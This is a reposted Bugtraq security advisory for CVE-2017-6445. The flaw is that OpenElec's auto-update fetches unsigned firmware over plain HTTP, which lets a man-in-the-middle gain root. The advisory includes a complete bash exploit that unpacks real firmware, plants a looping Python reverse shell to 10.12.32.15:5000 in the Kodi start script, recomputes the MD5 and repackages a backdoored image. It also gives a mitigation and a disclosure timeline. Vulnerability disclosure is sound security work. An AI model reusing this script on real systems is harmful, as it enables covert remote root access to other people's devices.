Bugtraq: OpenElec: Remote Code Execution Vulnerability through Man-In-The-Middle(CVE-2017-6445)

During my research about update mechanisms of open-source software I

discovered vulnerabilities in OpenElec.

== [ OVERVIEW ] ==

System affected: OpenElec

CVE: CVE-2017-6445

Vulnerable component: auto-update feature

Software-Version: 6.0.3, 7.0.1

User-Interaction: Reboot required

Impact: Remote Code Execution with root permission

== [ PRODUCT DESCRIPTION ] ==

According to its website “Open Embedded Linux Entertainment Center

(OpenELEC) is a small Linux based Just Enough Operating System (JeOS)

built from scratch as a platform to turn your computer into a Kodi media

center.”

== [ VULNERABILITY ] ==

Automatic updates are disabled by default. After enabling it, OpenElec

connects to http://update.openelec.tv/updates.php to find out if there

is an update for a newer version. If there is a newer version, openelec

will download it from http://releases.openelec.tv/<version>.tar(or any

other url returned by update.openelec.tv).

The auto-update feature of OpenElec does neither use encrypted

connections nor does it use signed updates. A Man-In-The-Middle could

manipulate the update-packages to gain root-access remotely.

In order to run the downloaded firmware, the OpenElec-system has to be

rebooted. So at this point user-interaction is required.

== [ EXPLOIT ] ==

The following code downloads an openelec-firmware, extracts it, places a

reverse-shell into the kodi-startscript and finally generates a

backdoored firmware:

#!/bin/bash

OPENELEC=”OpenELEC-RPi2.arm-7.0.1″

DOWNLOADURL=”http://releases.openelec.tv/”

TMP=”/tmp”

cd $TMP

test -e ${OPENELEC}.tar || wget $DOWNLOADURL/${OPENELEC}.tar

test -d $OPENELEC || tar xvf ${OPENELEC}.tar

test -d $TMP/unpacked || mkdir $TMP/unpacked

cd $TMP/unpacked

test -d $TMP/unpacked/squashfs-root || unsquashfs

$TMP/$OPENELEC/target/SYSTEM

cat > $TMP/unpacked/squashfs-root/usr/bin/revshell.sh << EOF

#!/bin/bash

while true

do

python -c ‘import

socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((“10.12.32.15”,5000));os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ > /dev/null 2>&1

done

EOF

chmod 777 $TMP/unpacked/squashfs-root/usr/bin/revshell.sh

awk ‘/trap cleanup TERM/ { print; print “/usr/bin/revshell.sh &”; next

}1′ $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh >

$TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh

mv $TMP/unpacked/squashfs-root/usr/lib/kodi/kodievil.sh

$TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh

chmod 777 $TMP/unpacked/squashfs-root/usr/lib/kodi/kodi.sh

mksquashfs squashfs-root/ SYS -noappend -comp gzip

mv SYS $TMP/$OPENELEC/target/SYSTEM

cd $TMP/$OPENELEC

md5sum target/SYSTEM > target/SYSTEM.md5

cd $TMP

tar cvf $OPENELEC.evil.tar $OPENELEC

test -d $TMP/unpacked && rm -fr $TMP/unpacked

test -d $OPENELEC && rm -rf $OPENELEC

== [ MITIGATION ] ==

Ensure that auto-update is disabled.

== [ Timeline ] ==

* This bug was reported on December 03 2016.

* Published as Zero-Day after no reply from OpenElec on March 04 2017

== [ CREDITS ] ==

CVE-2017-6445 was discovered by Wolfgang Hotwagner

(https://tech.feedyourhead.at/content/openelec-remote-code-execution-vul

nerability-through-man-in-the-middle)

[ reply ]

Source: SecurityFocus Vulnerabilities @ March 6, 2017 at 06:18AM

0
Share